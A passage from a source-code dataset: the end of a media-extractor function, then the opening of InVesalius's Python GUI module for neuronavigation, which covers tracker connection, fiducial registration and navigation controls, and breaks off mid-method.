if media_subtitle:
if isinstance(media_subtitle, dict):
media_subtitle = [media_subtitle]
for subtitle_data in media_subtitle:
subtitle = subtitle_data['@attributes']
lang = subtitle.get('lang') or 'en'
subtitles[lang] = [{'url': subtitle['href']}]
formats = []
media_content = get_media_node('content')
if isinstance(media_content, dict):
media_content = [media_content]
for media_data in media_content:
media = media_data.get('@attributes', {})
media_url = media.get('url')
if not media_url:
continue
ext = mimetype2ext(media.get('type')) or determine_ext(media_url)
if ext == 'f4m':
formats.extend(self._extract_f4m_formats(
media_url + '?hdcore=3.4.0&plugin=aasp-3.4.0.132.124',
video_id, f4m_id='hds', fatal=False))
elif ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
media_url, video_id, 'mp4', m3u8_id='hls', fatal=False))
else:
formats.append({
'format_id': media_data.get('media-category', {}).get('@attributes', {}).get('label'),
'url': media['url'],
'tbr': int_or_none(media.get('bitrate')),
'filesize': int_or_none(media.get('fileSize')),
'ext': ext,
})
self._sort_formats(formats)
timestamp = parse_iso8601(item.get('pubDate'), ' ') or parse_iso8601(item.get('dc-date'))
return {
'id': video_id,
'title': get_media_node('title'),
'description': get_media_node('description'),
'thumbnails': thumbnails,
'timestamp': timestamp,
'duration': int_or_none(media_content[0].get('@attributes', {}).get('duration')),
'subtitles': subtitles,
'formats': formats,
}
| unlicense | 1,595,772,301,398,573,300 | 38.064516 | 106 | 0.527663 | false |
paulojamorim/invesalius3 | invesalius/gui/task_navigator.py | 5 | 98510 | #--------------------------------------------------------------------------
# Software: InVesalius - Software de Reconstrucao 3D de Imagens Medicas
# Copyright: (C) 2001 Centro de Pesquisas Renato Archer
# Homepage: http://www.softwarepublico.gov.br
# Contact: [email protected]
# License: GNU - GPL 2 (LICENSE.txt/LICENCA.txt)
#--------------------------------------------------------------------------
# Este programa e software livre; voce pode redistribui-lo e/ou
# modifica-lo sob os termos da Licenca Publica Geral GNU, conforme
# publicada pela Free Software Foundation; de acordo com a versao 2
# da Licenca.
#
# Este programa eh distribuido na expectativa de ser util, mas SEM
# QUALQUER GARANTIA; sem mesmo a garantia implicita de
# COMERCIALIZACAO ou de ADEQUACAO A QUALQUER PROPOSITO EM
# PARTICULAR. Consulte a Licenca Publica Geral GNU para obter mais
# detalhes.
#--------------------------------------------------------------------------
from functools import partial
import csv
import os
import queue
import sys
import threading
import nibabel as nb
import numpy as np
try:
import Trekker
has_trekker = True
except ImportError:
has_trekker = False
import wx
try:
import wx.lib.agw.hyperlink as hl
import wx.lib.agw.foldpanelbar as fpb
except ImportError:
import wx.lib.hyperlink as hl
import wx.lib.foldpanelbar as fpb
import wx.lib.colourselect as csel
import wx.lib.masked.numctrl
from pubsub import pub as Publisher
from time import sleep
import invesalius.constants as const
import invesalius.data.bases as db
if has_trekker:
import invesalius.data.brainmesh_handler as brain
import invesalius.data.coordinates as dco
import invesalius.data.coregistration as dcr
import invesalius.data.slice_ as sl
import invesalius.data.trackers as dt
import invesalius.data.tractography as dti
import invesalius.data.transformations as tr
import invesalius.data.trigger as trig
import invesalius.data.record_coords as rec
import invesalius.data.vtk_utils as vtk_utils
import invesalius.gui.dialogs as dlg
import invesalius.project as prj
from invesalius import utils
BTN_NEW = wx.NewId()
BTN_IMPORT_LOCAL = wx.NewId()
class TaskPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
inner_panel = InnerTaskPanel(self)
sizer = wx.BoxSizer(wx.HORIZONTAL)
sizer.Add(inner_panel, 1, wx.EXPAND|wx.GROW|wx.BOTTOM|wx.RIGHT |
wx.LEFT, 7)
sizer.Fit(self)
self.SetSizer(sizer)
self.Update()
self.SetAutoLayout(1)
class InnerTaskPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
default_colour = self.GetBackgroundColour()
background_colour = wx.Colour(255,255,255)
self.SetBackgroundColour(background_colour)
txt_nav = wx.StaticText(self, -1, _('Select fiducials and navigate'),
size=wx.Size(90, 20))
txt_nav.SetFont(wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD))
# Create horizontal sizer to represent lines in the panel
txt_sizer = wx.BoxSizer(wx.HORIZONTAL)
txt_sizer.Add(txt_nav, 1, wx.EXPAND|wx.GROW, 5)
# Fold panel which contains navigation configurations
fold_panel = FoldPanel(self)
fold_panel.SetBackgroundColour(default_colour)
# Add line sizer into main sizer
main_sizer = wx.BoxSizer(wx.VERTICAL)
main_sizer.Add(txt_sizer, 0, wx.GROW|wx.EXPAND|wx.LEFT|wx.RIGHT, 5)
main_sizer.Add(fold_panel, 1, wx.GROW|wx.EXPAND|wx.LEFT|wx.RIGHT, 5)
main_sizer.AddSpacer(5)
main_sizer.Fit(self)
self.SetSizerAndFit(main_sizer)
self.Update()
self.SetAutoLayout(1)
self.sizer = main_sizer
class FoldPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
inner_panel = InnerFoldPanel(self)
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(inner_panel, 0, wx.EXPAND|wx.GROW)
sizer.Fit(self)
self.SetSizerAndFit(sizer)
self.Update()
self.SetAutoLayout(1)
class InnerFoldPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
try:
default_colour = wx.SystemSettings.GetColour(wx.SYS_COLOUR_MENUBAR)
except AttributeError:
default_colour = wx.SystemSettings_GetColour(wx.SYS_COLOUR_MENUBAR)
self.SetBackgroundColour(default_colour)
self.__bind_events()
# Fold panel and its style settings
# FIXME: If we dont insert a value in size or if we set wx.DefaultSize,
# the fold_panel doesnt show. This means that, for some reason, Sizer
# is not working properly in this panel. It might be on some child or
# parent panel. Perhaps we need to insert the item into the sizer also...
# Study this.
fold_panel = fpb.FoldPanelBar(self, -1, wx.DefaultPosition,
(10, 310), 0, fpb.FPB_SINGLE_FOLD)
# Fold panel style
style = fpb.CaptionBarStyle()
style.SetCaptionStyle(fpb.CAPTIONBAR_GRADIENT_V)
style.SetFirstColour(default_colour)
style.SetSecondColour(default_colour)
# Fold 1 - Navigation panel
item = fold_panel.AddFoldPanel(_("Neuronavigation"), collapsed=True)
ntw = NeuronavigationPanel(item)
fold_panel.ApplyCaptionStyle(item, style)
fold_panel.AddFoldPanelWindow(item, ntw, spacing=0,
leftSpacing=0, rightSpacing=0)
fold_panel.Expand(fold_panel.GetFoldPanel(0))
# Fold 2 - Object registration panel
item = fold_panel.AddFoldPanel(_("Object registration"), collapsed=True)
otw = ObjectRegistrationPanel(item)
fold_panel.ApplyCaptionStyle(item, style)
fold_panel.AddFoldPanelWindow(item, otw, spacing=0,
leftSpacing=0, rightSpacing=0)
# Fold 3 - Markers panel
item = fold_panel.AddFoldPanel(_("Markers"), collapsed=True)
mtw = MarkersPanel(item)
fold_panel.ApplyCaptionStyle(item, style)
fold_panel.AddFoldPanelWindow(item, mtw, spacing= 0,
leftSpacing=0, rightSpacing=0)
# Fold 4 - Tractography panel
if has_trekker:
item = fold_panel.AddFoldPanel(_("Tractography"), collapsed=True)
otw = TractographyPanel(item)
fold_panel.ApplyCaptionStyle(item, style)
fold_panel.AddFoldPanelWindow(item, otw, spacing=0,
leftSpacing=0, rightSpacing=0)
# Fold 5 - DBS
self.dbs_item = fold_panel.AddFoldPanel(_("Deep Brain Stimulation"), collapsed=True)
dtw = DbsPanel(self.dbs_item) #Atribuir nova var, criar panel
fold_panel.ApplyCaptionStyle(self.dbs_item, style)
fold_panel.AddFoldPanelWindow(self.dbs_item, dtw, spacing= 0,
leftSpacing=0, rightSpacing=0)
self.dbs_item.Hide()
# Check box for camera update in volume rendering during navigation
tooltip = wx.ToolTip(_("Update camera in volume"))
checkcamera = wx.CheckBox(self, -1, _('Vol. camera'))
checkcamera.SetToolTip(tooltip)
checkcamera.SetValue(const.CAM_MODE)
checkcamera.Bind(wx.EVT_CHECKBOX, self.OnVolumeCamera)
self.checkcamera = checkcamera
# Check box for trigger monitoring to create markers from serial port
tooltip = wx.ToolTip(_("Enable external trigger for creating markers"))
checktrigger = wx.CheckBox(self, -1, _('Ext. trigger'))
checktrigger.SetToolTip(tooltip)
checktrigger.SetValue(False)
checktrigger.Bind(wx.EVT_CHECKBOX, partial(self.OnExternalTrigger, ctrl=checktrigger))
self.checktrigger = checktrigger
# Check box for object position and orientation update in volume rendering during navigation
tooltip = wx.ToolTip(_("Show and track TMS coil"))
checkobj = wx.CheckBox(self, -1, _('Show coil'))
checkobj.SetToolTip(tooltip)
checkobj.SetValue(False)
checkobj.Disable()
checkobj.Bind(wx.EVT_CHECKBOX, self.OnShowObject)
self.checkobj = checkobj
# if sys.platform != 'win32':
self.checkcamera.SetWindowVariant(wx.WINDOW_VARIANT_SMALL)
checktrigger.SetWindowVariant(wx.WINDOW_VARIANT_SMALL)
checkobj.SetWindowVariant(wx.WINDOW_VARIANT_SMALL)
line_sizer = wx.BoxSizer(wx.HORIZONTAL)
line_sizer.Add(checkcamera, 0, wx.ALIGN_LEFT | wx.RIGHT | wx.LEFT, 5)
line_sizer.Add(checktrigger, 0, wx.ALIGN_CENTER)
line_sizer.Add(checkobj, 0, wx.RIGHT | wx.LEFT, 5)
line_sizer.Fit(self)
# Panel sizer to expand fold panel
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(fold_panel, 0, wx.GROW|wx.EXPAND)
sizer.Add(line_sizer, 1, wx.GROW | wx.EXPAND)
sizer.Fit(self)
self.track_obj = False
self.SetSizer(sizer)
self.Update()
self.SetAutoLayout(1)
def __bind_events(self):
Publisher.subscribe(self.OnCheckStatus, 'Navigation status')
Publisher.subscribe(self.OnShowObject, 'Update track object state')
Publisher.subscribe(self.OnVolumeCamera, 'Change camera checkbox')
Publisher.subscribe(self.OnShowDbs, "Active dbs folder")
Publisher.subscribe(self.OnHideDbs, "Deactive dbs folder")
def OnShowDbs(self):
self.dbs_item.Show()
def OnHideDbs(self):
self.dbs_item.Hide()
def OnCheckStatus(self, nav_status, vis_status):
if nav_status:
self.checktrigger.Enable(False)
self.checkobj.Enable(False)
else:
self.checktrigger.Enable(True)
if self.track_obj:
self.checkobj.Enable(True)
def OnExternalTrigger(self, evt, ctrl):
Publisher.sendMessage('Update trigger state', trigger_state=ctrl.GetValue())
def OnShowObject(self, evt=None, flag=None, obj_name=None, polydata=None):
if not evt:
if flag:
self.checkobj.Enable(True)
self.checkobj.SetValue(True)
self.track_obj = True
Publisher.sendMessage('Status target button', status=True)
else:
self.checkobj.Enable(False)
self.checkobj.SetValue(False)
self.track_obj = False
Publisher.sendMessage('Status target button', status=False)
Publisher.sendMessage('Update show object state', state=self.checkobj.GetValue())
def OnVolumeCamera(self, evt=None, status=None):
if not evt:
self.checkcamera.SetValue(status)
Publisher.sendMessage('Update volume camera state', camera_state=self.checkcamera.GetValue())
class NeuronavigationPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self, parent)
try:
default_colour = wx.SystemSettings.GetColour(wx.SYS_COLOUR_MENUBAR)
except AttributeError:
default_colour = wx.SystemSettings_GetColour(wx.SYS_COLOUR_MENUBAR)
self.SetBackgroundColour(default_colour)
self.SetAutoLayout(1)
self.__bind_events()
# Initialize global variables
self.fiducials = np.full([6, 3], np.nan)
self.fiducials_raw = np.zeros((6, 6))
self.correg = None
self.current_coord = 0, 0, 0
self.trk_init = None
self.nav_status = False
self.trigger = None
self.trigger_state = False
self.obj_reg = None
self.obj_reg_status = False
self.track_obj = False
self.m_icp = None
self.fre = None
self.icp_fre = None
self.icp = False
self.event = threading.Event()
self.coord_queue = QueueCustom(maxsize=1)
self.icp_queue = QueueCustom(maxsize=1)
# self.visualization_queue = QueueCustom(maxsize=1)
self.trigger_queue = QueueCustom(maxsize=1)
self.coord_tracts_queue = QueueCustom(maxsize=1)
self.tracts_queue = QueueCustom(maxsize=1)
# Tractography parameters
self.trk_inp = None
self.trekker = None
self.n_threads = None
self.view_tracts = False
self.enable_act = False
self.act_data = None
self.n_tracts = const.N_TRACTS
self.seed_offset = const.SEED_OFFSET
self.seed_radius = const.SEED_RADIUS
self.sleep_nav = const.SLEEP_NAVIGATION
self.tracker_id = const.DEFAULT_TRACKER
self.ref_mode_id = const.DEFAULT_REF_MODE
# Initialize list of buttons and numctrls for wx objects
self.btns_coord = [None, None, None, None, None, None]
self.numctrls_coord = [[], [], [], [], [], []]
# ComboBox for spatial tracker device selection
tooltip = wx.ToolTip(_("Choose the tracking device"))
choice_trck = wx.ComboBox(self, -1, "",
choices=const.TRACKER, style=wx.CB_DROPDOWN|wx.CB_READONLY)
choice_trck.SetToolTip(tooltip)
choice_trck.SetSelection(const.DEFAULT_TRACKER)
choice_trck.Bind(wx.EVT_COMBOBOX, partial(self.OnChoiceTracker, ctrl=choice_trck))
self.choice_trck = choice_trck
# ComboBox for tracker reference mode
tooltip = wx.ToolTip(_("Choose the navigation reference mode"))
choice_ref = wx.ComboBox(self, -1, "",
choices=const.REF_MODE, style=wx.CB_DROPDOWN|wx.CB_READONLY)
choice_ref.SetSelection(const.DEFAULT_REF_MODE)
choice_ref.SetToolTip(tooltip)
choice_ref.Bind(wx.EVT_COMBOBOX, partial(self.OnChoiceRefMode, ctrl=choice_trck))
# Toggle buttons for image fiducials
btns_img = const.BTNS_IMG
tips_img = const.TIPS_IMG
for k in btns_img:
n = list(btns_img[k].keys())[0]
lab = list(btns_img[k].values())[0]
self.btns_coord[n] = wx.ToggleButton(self, k, label=lab, size=wx.Size(45, 23))
self.btns_coord[n].SetToolTip(wx.ToolTip(tips_img[n]))
self.btns_coord[n].Bind(wx.EVT_TOGGLEBUTTON, self.OnImageFiducials)
# Push buttons for tracker fiducials
btns_trk = const.BTNS_TRK
tips_trk = const.TIPS_TRK
for k in btns_trk:
n = list(btns_trk[k].keys())[0]
lab = list(btns_trk[k].values())[0]
self.btns_coord[n] = wx.Button(self, k, label=lab, size=wx.Size(45, 23))
self.btns_coord[n].SetToolTip(wx.ToolTip(tips_trk[n-3]))
self.btns_coord[n].Bind(wx.EVT_BUTTON, self.OnTrackerFiducials)
# TODO: Find a better allignment between FRE, text and navigate button
txt_fre = wx.StaticText(self, -1, _('FRE:'))
txt_icp = wx.StaticText(self, -1, _('Refine:'))
# Fiducial registration error text box
tooltip = wx.ToolTip(_("Fiducial registration error"))
txtctrl_fre = wx.TextCtrl(self, value="", size=wx.Size(60, -1), style=wx.TE_CENTRE)
txtctrl_fre.SetFont(wx.Font(9, wx.DEFAULT, wx.NORMAL, wx.BOLD))
txtctrl_fre.SetBackgroundColour('WHITE')
txtctrl_fre.SetEditable(0)
txtctrl_fre.SetToolTip(tooltip)
self.txtctrl_fre = txtctrl_fre
# Toggle button for neuronavigation
tooltip = wx.ToolTip(_("Start navigation"))
btn_nav = wx.ToggleButton(self, -1, _("Navigate"), size=wx.Size(80, -1))
btn_nav.SetToolTip(tooltip)
btn_nav.Bind(wx.EVT_TOGGLEBUTTON, partial(self.OnNavigate, btn=(btn_nav, choice_trck, choice_ref)))
tooltip = wx.ToolTip(_(u"Refine the coregistration"))
checkicp = wx.CheckBox(self, -1, _(' '))
checkicp.SetValue(False)
checkicp.Enable(False)
checkicp.Bind(wx.EVT_CHECKBOX, partial(self.Oncheckicp, ctrl=checkicp))
checkicp.SetToolTip(tooltip)
self.checkicp = checkicp
# Image and tracker coordinates number controls
for m in range(len(self.btns_coord)):
for n in range(3):
self.numctrls_coord[m].append(
wx.lib.masked.numctrl.NumCtrl(parent=self, integerWidth=4, fractionWidth=1))
# Sizer to group all GUI objects
choice_sizer = wx.FlexGridSizer(rows=1, cols=2, hgap=5, vgap=5)
choice_sizer.AddMany([(choice_trck, wx.LEFT),
(choice_ref, wx.RIGHT)])
coord_sizer = wx.GridBagSizer(hgap=5, vgap=5)
for m in range(len(self.btns_coord)):
coord_sizer.Add(self.btns_coord[m], pos=wx.GBPosition(m, 0))
for n in range(3):
coord_sizer.Add(self.numctrls_coord[m][n], pos=wx.GBPosition(m, n+1))
if m in range(1, 6):
self.numctrls_coord[m][n].SetEditable(False)
nav_sizer = wx.FlexGridSizer(rows=1, cols=5, hgap=5, vgap=5)
nav_sizer.AddMany([(txt_fre, 0, wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTER_VERTICAL),
(txtctrl_fre, 0, wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTER_VERTICAL),
(btn_nav, 0, wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTER_VERTICAL),
(txt_icp, 0, wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTER_VERTICAL),
(checkicp, 0, wx.ALIGN_CENTER_HORIZONTAL | wx.ALIGN_CENTER_VERTICAL)])
group_sizer = wx.FlexGridSizer(rows=9, cols=1, hgap=5, vgap=5)
group_sizer.AddGrowableCol(0, 1)
group_sizer.AddGrowableRow(0, 1)
group_sizer.AddGrowableRow(1, 1)
group_sizer.AddGrowableRow(2, 1)
group_sizer.SetFlexibleDirection(wx.BOTH)
group_sizer.AddMany([(choice_sizer, 0, wx.ALIGN_CENTER_HORIZONTAL),
(coord_sizer, 0, wx.ALIGN_CENTER_HORIZONTAL),
(nav_sizer, 0, wx.ALIGN_CENTER_HORIZONTAL)])
main_sizer = wx.BoxSizer(wx.HORIZONTAL)
main_sizer.Add(group_sizer, 1)# wx.ALIGN_CENTER_HORIZONTAL, 10)
self.sizer = main_sizer
self.SetSizer(main_sizer)
self.Fit()
def __bind_events(self):
Publisher.subscribe(self.LoadImageFiducials, 'Load image fiducials')
Publisher.subscribe(self.UpdateTriggerState, 'Update trigger state')
Publisher.subscribe(self.UpdateTrackObjectState, 'Update track object state')
Publisher.subscribe(self.UpdateImageCoordinates, 'Set cross focal point')
Publisher.subscribe(self.OnDisconnectTracker, 'Disconnect tracker')
Publisher.subscribe(self.UpdateObjectRegistration, 'Update object registration')
Publisher.subscribe(self.OnCloseProject, 'Close project data')
Publisher.subscribe(self.UpdateTrekkerObject, 'Update Trekker object')
Publisher.subscribe(self.UpdateNumTracts, 'Update number of tracts')
Publisher.subscribe(self.UpdateSeedOffset, 'Update seed offset')
Publisher.subscribe(self.UpdateSeedRadius, 'Update seed radius')
Publisher.subscribe(self.UpdateSleep, 'Update sleep')
Publisher.subscribe(self.UpdateNumberThreads, 'Update number of threads')
Publisher.subscribe(self.UpdateTractsVisualization, 'Update tracts visualization')
Publisher.subscribe(self.EnableACT, 'Enable ACT')
Publisher.subscribe(self.UpdateACTData, 'Update ACT data')
Publisher.subscribe(self.UpdateNavigationStatus, 'Navigation status')
def LoadImageFiducials(self, marker_id, coord):
for n in const.BTNS_IMG_MKS:
btn_id = list(const.BTNS_IMG_MKS[n].keys())[0]
fid_id = list(const.BTNS_IMG_MKS[n].values())[0]
if marker_id == fid_id and not self.btns_coord[btn_id].GetValue():
self.btns_coord[btn_id].SetValue(True)
self.fiducials[btn_id, :] = coord[0:3]
for m in [0, 1, 2]:
self.numctrls_coord[btn_id][m].SetValue(coord[m])
def UpdateNavigationStatus(self, nav_status, vis_status):
self.nav_status = nav_status
if nav_status and (self.m_icp is not None):
self.checkicp.Enable(True)
else:
self.checkicp.Enable(False)
#self.checkicp.SetValue(False)
def UpdateFRE(self, fre):
# TODO: Exhibit FRE in a warning dialog and only starts navigation after user clicks ok
self.txtctrl_fre.SetValue(str(round(fre, 2)))
if fre <= 3:
self.txtctrl_fre.SetBackgroundColour('GREEN')
else:
self.txtctrl_fre.SetBackgroundColour('RED')
def UpdateTrekkerObject(self, data):
# self.trk_inp = data
self.trekker = data
def UpdateNumTracts(self, data):
self.n_tracts = data
def UpdateSeedOffset(self, data):
self.seed_offset = data
def UpdateSeedRadius(self, data):
self.seed_radius = data
def UpdateSleep(self, data):
self.sleep_nav = data
def UpdateNumberThreads(self, data):
self.n_threads = data
def UpdateTractsVisualization(self, data):
self.view_tracts = data
def UpdateACTData(self, data):
self.act_data = data
def EnableACT(self, data):
self.enable_act = data
def UpdateImageCoordinates(self, position):
# TODO: Change from world coordinates to matrix coordinates. They are better for multi software communication.
self.current_coord = position
for m in [0, 1, 2]:
if not self.btns_coord[m].GetValue():
for n in [0, 1, 2]:
self.numctrls_coord[m][n].SetValue(float(self.current_coord[n]))
def UpdateObjectRegistration(self, data=None):
if data:
self.obj_reg = data
self.obj_reg_status = True
else:
self.obj_reg = None
self.obj_reg_status = False
def UpdateTrackObjectState(self, evt=None, flag=None, obj_name=None, polydata=None):
self.track_obj = flag
def UpdateTriggerState(self, trigger_state):
self.trigger_state = trigger_state
def OnDisconnectTracker(self):
if self.tracker_id:
dt.TrackerConnection(self.tracker_id, self.trk_init[0], 'disconnect')
def OnChoiceTracker(self, evt, ctrl):
Publisher.sendMessage('Update status text in GUI',
label=_("Configuring tracker ..."))
if hasattr(evt, 'GetSelection'):
choice = evt.GetSelection()
else:
choice = const.DISCTRACK
if self.trk_init:
trck = self.trk_init[0]
else:
trck = None
# Conditions check if click was on current selection and if any other tracker
# has been initialized before
if trck and choice != const.DISCTRACK:
self.ResetTrackerFiducials()
Publisher.sendMessage('Update status text in GUI',
label=_("Disconnecting tracker..."))
Publisher.sendMessage('Remove sensors ID')
self.trk_init = dt.TrackerConnection(self.tracker_id, trck, 'disconnect')
Publisher.sendMessage('Remove object data')
self.tracker_id = choice
if not self.trk_init[0] and choice:
Publisher.sendMessage('Update status text in GUI',
label=_("Tracker disconnected successfully"))
self.trk_init = dt.TrackerConnection(self.tracker_id, None, 'connect')
if not self.trk_init[0]:
dlg.ShowNavigationTrackerWarning(self.tracker_id, self.trk_init[1])
ctrl.SetSelection(0)
print("Tracker not connected!")
else:
ctrl.SetSelection(self.tracker_id)
print("Tracker connected!")
elif choice == const.DISCTRACK:
if trck:
self.ResetTrackerFiducials()
Publisher.sendMessage('Update status text in GUI',
label=_("Disconnecting tracker ..."))
Publisher.sendMessage('Remove sensors ID')
Publisher.sendMessage('Remove object data')
self.trk_init = dt.TrackerConnection(self.tracker_id, trck, 'disconnect')
if not self.trk_init[0]:
if evt is not False:
dlg.ShowNavigationTrackerWarning(self.tracker_id, 'disconnect')
self.tracker_id = 0
ctrl.SetSelection(self.tracker_id)
Publisher.sendMessage('Update status text in GUI',
label=_("Tracker disconnected"))
print("Tracker disconnected!")
else:
Publisher.sendMessage('Update status text in GUI',
label=_("Tracker still connected"))
print("Tracker still connected!")
else:
ctrl.SetSelection(self.tracker_id)
else:
# If trk_init is None try to connect. If doesn't succeed show dialog.
if choice:
self.tracker_id = choice
self.trk_init = dt.TrackerConnection(self.tracker_id, None, 'connect')
if not self.trk_init[0]:
dlg.ShowNavigationTrackerWarning(self.tracker_id, self.trk_init[1])
self.tracker_id = 0
ctrl.SetSelection(self.tracker_id)
Publisher.sendMessage('Update status text in GUI', label=_("Ready"))
Publisher.sendMessage('Update tracker initializer',
nav_prop=(self.tracker_id, self.trk_init, self.ref_mode_id))
def OnChoiceRefMode(self, evt, ctrl):
# When ref mode is changed the tracker coordinates are set to zero
self.ref_mode_id = evt.GetSelection()
self.ResetTrackerFiducials()
# Some trackers do not accept restarting within this time window
# TODO: Improve the restarting of trackers after changing reference mode
# self.OnChoiceTracker(None, ctrl)
Publisher.sendMessage('Update tracker initializer',
nav_prop=(self.tracker_id, self.trk_init, self.ref_mode_id))
print("Reference mode changed!")
def OnImageFiducials(self, evt):
btn_id = list(const.BTNS_IMG_MKS[evt.GetId()].keys())[0]
marker_id = list(const.BTNS_IMG_MKS[evt.GetId()].values())[0]
if self.btns_coord[btn_id].GetValue():
coord = self.numctrls_coord[btn_id][0].GetValue(),\
self.numctrls_coord[btn_id][1].GetValue(),\
self.numctrls_coord[btn_id][2].GetValue(), 0, 0, 0
self.fiducials[btn_id, :] = coord[0:3]
Publisher.sendMessage('Create marker', coord=coord, marker_id=marker_id)
else:
for n in [0, 1, 2]:
self.numctrls_coord[btn_id][n].SetValue(float(self.current_coord[n]))
self.fiducials[btn_id, :] = np.nan
Publisher.sendMessage('Delete fiducial marker', marker_id=marker_id)
def OnTrackerFiducials(self, evt):
btn_id = list(const.BTNS_TRK[evt.GetId()].keys())[0]
coord = None
if self.trk_init and self.tracker_id:
# if self.tracker_id == const.DEBUGTRACK:
# if btn_id == 3:
# coord1 = np.array([-120., 0., 0., 0., 0., 0.])
# elif btn_id == 4:
# coord1 = np.array([120., 0., 0., 0., 0., 0.])
# elif btn_id == 5:
# coord1 = np.array([0., 120., 0., 0., 0., 0.])
# coord2 = np.zeros([3, 6])
# coord_raw = np.vstack([coord1, coord2])
# else:
coord_raw = dco.GetCoordinates(self.trk_init, self.tracker_id, self.ref_mode_id)
if self.ref_mode_id:
coord = dco.dynamic_reference_m(coord_raw[0, :], coord_raw[1, :])
else:
coord = coord_raw[0, :]
coord[2] = -coord[2]
else:
dlg.ShowNavigationTrackerWarning(0, 'choose')
# Update number controls with tracker coordinates
if coord is not None:
self.fiducials[btn_id, :] = coord[0:3]
if btn_id == 3:
self.fiducials_raw[0, :] = coord_raw[0, :]
self.fiducials_raw[1, :] = coord_raw[1, :]
elif btn_id == 4:
self.fiducials_raw[2, :] = coord_raw[0, :]
self.fiducials_raw[3, :] = coord_raw[1, :]
else:
self.fiducials_raw[4, :] = coord_raw[0, :]
self.fiducials_raw[5, :] = coord_raw[1, :]
for n in [0, 1, 2]:
self.numctrls_coord[btn_id][n].SetValue(float(coord[n]))
def OnICP(self):
dialog = dlg.ICPCorregistrationDialog(nav_prop=(self.tracker_id, self.trk_init, self.ref_mode_id))
if dialog.ShowModal() == wx.ID_OK:
self.m_icp, point_coord, transformed_points, prev_error, final_error = dialog.GetValue()
#TODO: checkbox in the dialog to transfer the icp points to 3D viewer
#create markers
# for i in range(len(point_coord)):
# img_coord = point_coord[i][0],-point_coord[i][1],point_coord[i][2], 0, 0, 0
# transf_coord = transformed_points[i][0],-transformed_points[i][1],transformed_points[i][2], 0, 0, 0
# Publisher.sendMessage('Create marker', coord=img_coord, marker_id=None, colour=(1,0,0))
# Publisher.sendMessage('Create marker', coord=transf_coord, marker_id=None, colour=(0,0,1))
if self.m_icp is not None:
dlg.ReportICPerror(prev_error, final_error)
self.checkicp.Enable(True)
self.checkicp.SetValue(True)
self.icp = True
else:
self.checkicp.Enable(False)
self.checkicp.SetValue(False)
self.icp = False
return self.m_icp
def Oncheckicp(self, evt, ctrl):
if ctrl.GetValue() and evt and (self.m_icp is not None):
self.icp = True
else:
self.icp = False
self.ctrl_icp()
def ctrl_icp(self):
if self.icp:
self.UpdateFRE(self.icp_fre)
else:
self.UpdateFRE(self.fre)
self.icp_queue.put_nowait([self.icp, self.m_icp])
#print(self.icp, self.m_icp)
def OnNavigate(self, evt, btn):
btn_nav = btn[0]
choice_trck = btn[1]
choice_ref = btn[2]
errors = False
# initialize jobs list
jobs_list = []
vis_components = [self.trigger_state, self.view_tracts]
vis_queues = [self.coord_queue, self.trigger_queue, self.tracts_queue, self.icp_queue]
nav_id = btn_nav.GetValue()
if not nav_id:
self.event.set()
# print("coord unfinished: {}, queue {}", self.coord_queue.unfinished_tasks, self.coord_queue.qsize())
# print("coord_tracts unfinished: {}, queue {}", self.coord_tracts_queue.unfinished_tasks, self.coord_tracts_queue.qsize())
# print("tracts unfinished: {}, queue {}", self.tracts_queue.unfinished_tasks, self.tracts_queue.qsize())
self.coord_queue.clear()
# self.visualization_queue.clear()
if self.trigger_state:
self.trigger_queue.clear()
if self.view_tracts:
self.coord_tracts_queue.clear()
self.tracts_queue.clear()
# print("coord after unfinished: {}, queue {}", self.coord_queue.unfinished_tasks, self.coord_queue.qsize())
# print("coord_tracts after unfinished: {}, queue {}", self.coord_tracts_queue.unfinished_tasks, self.coord_tracts_queue.qsize())
# print("tracts after unfinished: {}, queue {}", self.tracts_queue.unfinished_tasks, self.tracts_queue.qsize())
self.coord_queue.join()
# self.visualization_queue.join()
if self.trigger_state:
self.trigger_queue.join()
if self.view_tracts:
self.coord_tracts_queue.join()
self.tracts_queue.join()
# print("coord join unfinished: {}, queue {}", self.coord_queue.unfinished_tasks, self.coord_queue.qsize())
# print("vis join unfinished: {}, queue {}", self.visualization_queue.unfinished_tasks, self.visualization_queue.qsize())
tooltip = wx.ToolTip(_("Start neuronavigation"))
btn_nav.SetToolTip(tooltip)
# Enable all navigation buttons
choice_ref.Enable(True)
choice_trck.Enable(True)
for btn_c in self.btns_coord:
btn_c.Enable(True)
# if self.trigger_state:
# self.trigger.stop()
Publisher.sendMessage("Navigation status", nav_status=False, vis_status=vis_components)
else:
if np.isnan(self.fiducials).any():
wx.MessageBox(_("Invalid fiducials, select all coordinates."), _("InVesalius 3"))
btn_nav.SetValue(False)
elif not self.trk_init[0] or not self.tracker_id:
dlg.ShowNavigationTrackerWarning(0, 'choose')
errors = True
else:
if self.event.is_set():
self.event.clear()
# prepare GUI for navigation
Publisher.sendMessage("Navigation status", nav_status=True, vis_status=vis_components)
Publisher.sendMessage("Toggle Cross", id=const.SLICE_STATE_CROSS)
Publisher.sendMessage("Hide current mask")
tooltip = wx.ToolTip(_("Stop neuronavigation"))
btn_nav.SetToolTip(tooltip)
# disable all navigation buttons
choice_ref.Enable(False)
choice_trck.Enable(False)
for btn_c in self.btns_coord:
btn_c.Enable(False)
# fiducials matrix
m_change = tr.affine_matrix_from_points(self.fiducials[3:, :].T, self.fiducials[:3, :].T,
shear=False, scale=False)
# initialize spatial tracker parameters
tracker_mode = self.trk_init, self.tracker_id, self.ref_mode_id
# compute fiducial registration error (FRE)
if not self.icp_fre:
self.fre = db.calculate_fre(self.fiducials_raw, self.fiducials, self.ref_mode_id, m_change)
self.UpdateFRE(self.fre)
if self.track_obj:
# if object tracking is selected
if not self.obj_reg_status:
# check if object registration was performed
wx.MessageBox(_("Perform coil registration before navigation."), _("InVesalius 3"))
errors = True
else:
